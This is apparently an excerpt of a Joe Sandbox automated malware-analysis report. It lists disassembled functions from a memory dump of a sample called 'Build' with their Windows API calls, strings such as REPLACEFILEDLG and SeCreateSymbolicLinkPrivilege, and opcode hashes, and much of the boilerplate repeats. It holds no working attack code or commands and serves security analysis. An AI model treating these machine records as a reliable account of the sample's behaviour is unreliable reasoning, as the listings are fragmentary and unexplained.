Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3f06e26d099fb8752ea83e16ef3a93b62c993a31b64656afe594bd758a7b8705
Instruction ID: 357d079800bd1f25ba869a23f7ff9ce98f9338f2a428de1071e1efbfcc109fe2
Opcode Fuzzy Hash: 3f06e26d099fb8752ea83e16ef3a93b62c993a31b64656afe594bd758a7b8705
Instruction Fuzzy Hash: 2FA002D5699101FC310571959D16D36015CD4D4B55730991FF545D4081586D685E503A

Function 00440A7F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1587eae6dac1aeca746804a1638ad9300dd149dd4249e16a27b6d6a409d21c18
Instruction ID: 357d079800bd1f25ba869a23f7ff9ce98f9338f2a428de1071e1efbfcc109fe2
Opcode Fuzzy Hash: 1587eae6dac1aeca746804a1638ad9300dd149dd4249e16a27b6d6a409d21c18
Instruction Fuzzy Hash: 2FA002D5699101FC310571959D16D36015CD4D4B55730991FF545D4081586D685E503A

Function 00440A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c285dba777eadb208fcbf0dd416d0f76e71b4deb7eba567e0d03a5f3c8ce819
Instruction ID: 725f8c40ea21665f82dc66bae110e006a534593313c5f8ba2162b48ec7b504f9
Opcode Fuzzy Hash: 7c285dba777eadb208fcbf0dd416d0f76e71b4deb7eba567e0d03a5f3c8ce819
Instruction Fuzzy Hash: 11A002D5799101FC75056155AD16D76011CD4C4B55730892FF505C4046587D285D513A

Function 00440A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ec699fcb29385a227b72de89c8b3aecefcafb9de5f57799a067c3285f0d1000
Instruction ID: 725f8c40ea21665f82dc66bae110e006a534593313c5f8ba2162b48ec7b504f9
Opcode Fuzzy Hash: 3ec699fcb29385a227b72de89c8b3aecefcafb9de5f57799a067c3285f0d1000
Instruction Fuzzy Hash: 11A002D5799101FC75056155AD16D76011CD4C4B55730892FF505C4046587D285D513A

Function 00440A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c410e854a2975c56672314422582ee39e196b05eeb9ae9069f41aaca3f5c5c2b
Instruction ID: 725f8c40ea21665f82dc66bae110e006a534593313c5f8ba2162b48ec7b504f9
Opcode Fuzzy Hash: c410e854a2975c56672314422582ee39e196b05eeb9ae9069f41aaca3f5c5c2b
Instruction Fuzzy Hash: 11A002D5799101FC75056155AD16D76011CD4C4B55730892FF505C4046587D285D513A

Function 0042B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0042A712,?,?,?,?,?,?,?), ref: 0042B94C

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 478442046d581c4ed9045f0aff0156ca8b51597224596586a1324d4b84d869e4
Instruction ID: c18532d481ff988ca4fc755d0c04b8fadc94890c978d39eae3f6b1046f728557
Opcode Fuzzy Hash: 478442046d581c4ed9045f0aff0156ca8b51597224596586a1324d4b84d869e4
Instruction Fuzzy Hash: 59A0113008000A8A8E002B30CA0800E3B22EB22BC230202A8A00BCB0A2CB22880B8A00

Function 0043CBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0043CBBA

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e6d2cab954a38ff4021b83b2a2b989495cc7f5b2612e5da77fbefb82fef720a6
Instruction ID: e1ff528a807cd578c1f57342e81fe8322bdca8cd7ddbf6caf17c0c303cb7931e
Opcode Fuzzy Hash: e6d2cab954a38ff4021b83b2a2b989495cc7f5b2612e5da77fbefb82fef720a6
Instruction Fuzzy Hash: 55A012302002008782000B318F0550E76556F51601F01C034604180031C731C820A504

Non-executed Functions

Function 0043E560 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 240windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00421366: GetDlgItem.USER32(00000000,00003021), ref: 004213AA
Part of subcall function 00421366: SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0043E602
EndDialog.USER32(?,00000006), ref: 0043E615
GetDlgItem.USER32(?,0000006C), ref: 0043E631
SetFocus.USER32(00000000), ref: 0043E638
SetDlgItemTextW.USER32(?,00000065,?), ref: 0043E66C
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0043E69F
FindFirstFileW.KERNEL32(?,?), ref: 0043E6B5

Part of subcall function 0043CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0043CBEE
Part of subcall function 0043CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0043CC05
Part of subcall function 0043CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0043CC19
Part of subcall function 0043CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0043CC2A
Part of subcall function 0043CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043CC42
Part of subcall function 0043CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0043CC66
Part of subcall function 0043CBC8: _swprintf.LIBCMT ref: 0043CC85

_swprintf.LIBCMT ref: 0043E704

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0043E717
FindClose.KERNEL32(00000000), ref: 0043E71E
_swprintf.LIBCMT ref: 0043E773
SetDlgItemTextW.USER32(?,00000068,?), ref: 0043E786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0043E7A0
_swprintf.LIBCMT ref: 0043E7D9
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0043E7EC
_swprintf.LIBCMT ref: 0043E83C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0043E84F

Part of subcall function 0043D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043D0E1
Part of subcall function 0043D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0046272C,?,?), ref: 0043D12A

Strings

-D, xrefs: 0043E68C
REPLACEFILEDLG, xrefs: 0043E59C
%s %s, xrefs: 0043E6F1, 0043E6FD, 0043E769, 0043E7CF, 0043E832

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$-D$REPLACEFILEDLG
API String ID: 3464475507-270460220
Opcode ID: a8fb7aab9366973d75559df186fae9c9f34d2aeeaedba8d1a69b945f4b7c53a6
Instruction ID: 173faf44e547d8f76f3b1d50f62230b7c7ef9cac0c00c746ad58fa904ef720ce
Opcode Fuzzy Hash: a8fb7aab9366973d75559df186fae9c9f34d2aeeaedba8d1a69b945f4b7c53a6
Instruction Fuzzy Hash: 6671C672649314BBE331AB65DC89FFF779CAB89704F00082EF649D21C1D67999048B6A

Function 00427FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0042807F
_wcslen.LIBCMT ref: 00428112

Part of subcall function 00428C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00428CB2
Part of subcall function 00428C95: GetLastError.KERNEL32 ref: 00428CF6
Part of subcall function 00428C95: CloseHandle.KERNEL32(?), ref: 00428D05

Part of subcall function 0042BC65: DeleteFileW.KERNELBASE(?,?,?,?,0042B14B,?,00000000,0042AF6E,D72E4020,00000000,0045517A,000000FF,?,00428882,?,?), ref: 0042BC82
Part of subcall function 0042BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0042B14B,?,00000000,0042AF6E,D72E4020,00000000,0045517A,000000FF,?,00428882,?), ref: 0042BCAE

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 004281C1
CloseHandle.KERNEL32(00000000), ref: 004281DD
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,D72E4020,00000000), ref: 00428329

Part of subcall function 0042B7E2: FlushFileBuffers.KERNEL32(?), ref: 0042B7FC
Part of subcall function 0042B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0042B8B0

Part of subcall function 0042AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0042AF75,D72E4020,00000000,0045517A,000000FF,?,00428882,?,?), ref: 0042AFEB

Part of subcall function 0042C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0042BF5E,?,?), ref: 0042C305
Part of subcall function 0042C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042BF5E,?,?), ref: 0042C334

Strings

UNC\, xrefs: 004280D2
\??\, xrefs: 004280A1
SeRestorePrivilege, xrefs: 00428034
SeCreateSymbolicLinkPrivilege, xrefs: 0042803E

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 243576179-3508440684
Opcode ID: 5f041ea5c288f67cc7d6480b094951ba645ab97a3e3bfc46293ef069edfa24a6
Instruction ID: 265c3d0e5f7f75ec1b1e63a6e94baae06ad3d427a7162f43f5f461c654755d1e
Opcode Fuzzy Hash: 5f041ea5c288f67cc7d6480b094951ba645ab97a3e3bfc46293ef069edfa24a6
Instruction Fuzzy Hash: A4D1A6B1A01259ABDB20DF61DC41BEF77A8BF04704F40451FFA45E7282DB7CAA448B69

Function 00441FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00441FD6
IsDebuggerPresent.KERNEL32 ref: 004420A2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004420C2
UnhandledExceptionFilter.KERNEL32(?), ref: 004420CC

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5d1613eb6d4121e755709d5700206414a7500a61e9d616c737aa434e5bf91c15
Instruction ID: 13a54705e763bfbc5687eac4ba63306ff5f7e74de40241fab65a379abc1ca0f8
Opcode Fuzzy Hash: 5d1613eb6d4121e755709d5700206414a7500a61e9d616c737aa434e5bf91c15
Instruction Fuzzy Hash: 61312B75D053189BEB20DFA5D9897CDBBB8BF04304F5041AAE50DAB251EB759A84CF08

Function 00440B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00440AC5,0000001C,00440CBA,00000000,?,?,?,?,?,?,?,00440AC5,00000004,00485D24,00440D4A), ref: 00440B91
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00440AC5,00000004,00485D24,00440D4A), ref: 00440BAC

Strings

D, xrefs: 00440BA0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 1be0de6767bd88b5dc8c4065df3ddc18db48b097934aaf11ae985a2c04b478e2
Instruction ID: b22dbaa116a2e2dde91037c6ef8783caa005a9e53c9d7cd8ee7084a2b1abc938
Opcode Fuzzy Hash: 1be0de6767bd88b5dc8c4065df3ddc18db48b097934aaf11ae985a2c04b478e2
Instruction Fuzzy Hash: AE01F7326005096BEB14DF69DC05FEE7BA9EFC4328F0CC225AE59DB255D638E8118688

Function 0043D0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043D0E1
GetNumberFormatW.KERNEL32(00000400,00000000,?,0046272C,?,?), ref: 0043D12A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: e4241b5b0df1978e8087758545e0cbff8e269dea1f661ea4e0f89b5e7661b10b
Instruction ID: 9ceccce7f99a40b15f5c8018d2cb8681137ab11896b617793ff05967ed7f9715
Opcode Fuzzy Hash: e4241b5b0df1978e8087758545e0cbff8e269dea1f661ea4e0f89b5e7661b10b
Instruction Fuzzy Hash: E2115B35610308BBD711DF65DD41FAB77B8EF08702F40943AF901E7291E6B4AA45CB69

Function 00427BFF Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00427D6C,?,00000400), ref: 00427BFF
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00427C20

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c547a4115d97610853ec58a883d78e3aa02c77c4afc8e75057454eadfe280ce0
Instruction ID: 46d4dff1e64a997419682952d7f3bc07f245213202c5d6ccb6dc2d20c3a948c0
Opcode Fuzzy Hash: c547a4115d97610853ec58a883d78e3aa02c77c4afc8e75057454eadfe280ce0
Instruction Fuzzy Hash: 09D0A930388300BBFA000A325C06F2B7798AB05F62F90C815B301E90E1CA74C020A62D

Function 0042D076 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0042D0A7

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 8e8166c170167029d45712333a2a582989efe9a78b590b3ea62879fcf46293a6
Instruction ID: a84fa4769375daf9e896013e647743832816985dd86357244c8c57d42bf2c86b
Opcode Fuzzy Hash: 8e8166c170167029d45712333a2a582989efe9a78b590b3ea62879fcf46293a6
Instruction Fuzzy Hash: 85016270E00608CFDB24CF24ED41A9D77B1FB58308F60422AD516973A1E7B49549CF4A

Function 00430244 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00430284

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

Part of subcall function 00433F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0042F801,00000000,00000000,?,00465070,?,0042F801,?,?,00000050,?), ref: 00433F64

_strlen.LIBCMT ref: 004302A5
SetDlgItemTextW.USER32(?,00462274,?), ref: 004302FE
GetWindowRect.USER32(?,?), ref: 00430334
GetClientRect.USER32(?,?), ref: 00430340
GetWindowLongW.USER32(?,000000F0), ref: 004303EB
GetWindowRect.USER32(?,?), ref: 0043041B
SetWindowTextW.USER32(?,?), ref: 0043044A
GetSystemMetrics.USER32(00000008), ref: 00430452
GetWindow.USER32(?,00000005), ref: 0043045D
GetWindowRect.USER32(00000000,?), ref: 0043048D
GetWindow.USER32(00000000,00000002), ref: 004304FF

Strings

CAPTION, xrefs: 00430432
d, xrefs: 00430360
t"F, xrefs: 004302B9
$%s:, xrefs: 0043026D

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
